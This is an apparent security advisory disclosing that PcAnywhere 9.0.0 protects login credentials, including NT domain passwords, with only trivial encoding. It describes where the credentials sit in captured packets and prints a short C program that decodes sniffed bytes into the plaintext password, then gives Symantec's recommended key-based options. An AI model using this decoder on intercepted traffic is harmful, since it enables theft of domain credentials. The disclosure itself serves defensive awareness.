COMMAND
PcAnywhere
SYSTEMS AFFECTED
PcAnywhere 9.0.0
PROBLEM
Pascal Longpre found following. PcAnywhere 9.0.0 set to its
default security value uses a trivial encryption method so user
names and password are not sent directly in clear. Since most
users have the encryption methods set to either "none" or
"PcAnyWhere", their password are sent with weak encryption.
A major concern lies in the fact that PcAnywhere can authenticate
users based on their NT domain accounts and passwords. When the
user logs on, it is prompted for its NT username and password.
They are then "encrypted" through the PcAnywhere method and
decrypted by the host computer for validation by the NT domain
controller. Someone snooping on the traffic between the two
stations will unlock both the PcAnywhere and NT account. All
that without even having to go through the L0phtCrack process.
Version 7.0 is not at risk since no encryption is used at all.
Username and password are sent in clear. Version 8 was not tested
yet.
The Username / password are contained in a string two packets away
from the "Enter your login name" and "Enter your password"
prompts. They are preceded by 0x06. The next number is the
string length. Here is the code of the exploit:
#include <stdio.h>
#include <string.h>
void main() {
char password[128];
char cleartext[128];
int i;
// input the sniffed hex values here
// Encrypted example of the 'aaaaa' password
password[0]=0xca;
password[1]=0xab;
password[2]=0xcb;
password[3]=0xa8;
password[4]=0xca;
password[5]='\0';
cleartext[0]=0xca-password[0]+0x61;
for (i=1;i<strlen(password);i++)
cleartext[i] = password[i-1] ^ password[i] ^ i-1;
cleartext[strlen(password)]='\0';
printf("password is %s \n",cleartext);
}
SOLUTION
Symantec says that this was not intended to be real encryption and
suggest the use of the Public or Symetric key option instead. More
info can be found at:
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w